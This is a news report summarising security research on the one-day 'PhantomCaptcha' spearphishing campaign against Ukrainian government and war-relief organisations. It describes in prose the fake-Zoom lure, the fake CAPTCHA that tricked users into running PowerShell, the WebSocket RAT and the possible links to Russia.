A targeted spearphishing campaign that ran for a single day attempted to compromise members of a Ukrainian regional government administration and organisations involved in the country’s war relief effort, including the International Committee of the Red Cross, UNICEF and several non-governmental groups. Security researchers gave the operation the name PhantomCaptcha.
E-mails impersonating the Ukrainian President’s Office carried malicious PDF attachments that linked to a domain impersonating the Zoom service (zoomconference.app). Visitors who clicked the link were shown an automated browser check that generated a client identifier and passed it to the attacker’s server over a WebSocket connection, a behaviour described in SentinelLABS’ analysis.
If the WebSocket server responded with a matching identifier, the victim’s browser was redirected to a legitimate, password-protected Zoom meeting; otherwise the site presented a fake CAPTCHA in Ukrainian. The instructions prompted users to copy a token and paste it into a Windows command prompt, which caused a PowerShell command to download and execute a malicious script named cptch.
The cptch component acted as a reconnaissance and system-profiling tool, collecting computer name, domain information, username, process ID and system UUID and sending the data to a command-and-control server. A lightweight WebSocket remote access trojan (RAT) delivered as the final payload provided remote command execution and data exfiltration using base64-encoded JSON commands.
Researchers reported the short-lived October 8 campaign was linked to a later operation in Lviv that used adult-themed Android APKs or cloud storage tools to install spyware that monitored real-time location, call logs, contacts and images. SentinelLABS did not attribute the PhantomCaptcha campaign but noted the RAT was hosted on Russian infrastructure and said the Android activity may be related to Russia/Belarus source development.
The researchers also said the threat actor spent months preparing the operation, with some domains used in the attack registered at the end of March. A separate report by Google Threat Intelligence Group described similar ‘I am not a robot’ CAPTCHA challenges used by a group tracked as ColdRiver and attributed by some to the Russian intelligence service.